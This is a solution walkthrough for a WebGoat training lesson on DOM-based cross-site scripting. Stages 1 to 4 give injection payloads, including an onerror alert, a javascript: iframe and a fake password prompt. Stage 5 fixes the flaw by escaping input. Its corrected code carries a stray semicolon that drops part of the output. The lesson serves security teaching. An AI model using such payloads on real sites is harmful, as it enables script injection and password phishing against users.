DOM Based Cross Site Scripting (XSS)

Lesson Plan Title: DOM Based Cross Site Scripting (XSS)

Concept / Topic To Teach:
The Document Object Model (DOM) presents an interesting problem from a security standpoint. It allows the content of a web page to be dynamically modified, but that can be abused by attackers during a malicious code injection. XSS, a type of malicious code injection, can occur when unvalidated user input is used directly to modify the content of a page on the client side.

General Goal(s):
For this exercise, your mission is to use this vulnerability to inject malicious code into the DOM. Then in the last stage, you will correct the flaws in the code to address the vulnerability.

Solution:

Stage 1: Enter "<IMG SRC="images/logos/owasp.jpg"/>" and submit the solution.

Stage 1 result

Stage 2: Enter "<img src=x onerror=;;alert('XSS') />" and submit the solution.

Stage 2 result

Stage 3: Enter "<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" and submit the solution.

Stage 3 result

Stage 4: Enter "Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR>" and submit the solution.

Stage 4 result

Stage 5: You have to use the JavaScript escape.js for the input.
You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).
Open the JavaScript DOMXSS.js

function displayGreeting(name) {
if (name != ''){
document.getElementById("greeting").innerHTML="Hello, " + name + "!";
}
}

You have to change this to:

function displayGreeting(name) {
if (name != ''){
document.getElementById("greeting").innerHTML="Hello, " + escapeHTML(name); + "!";
}
}

The attacks will no longer work.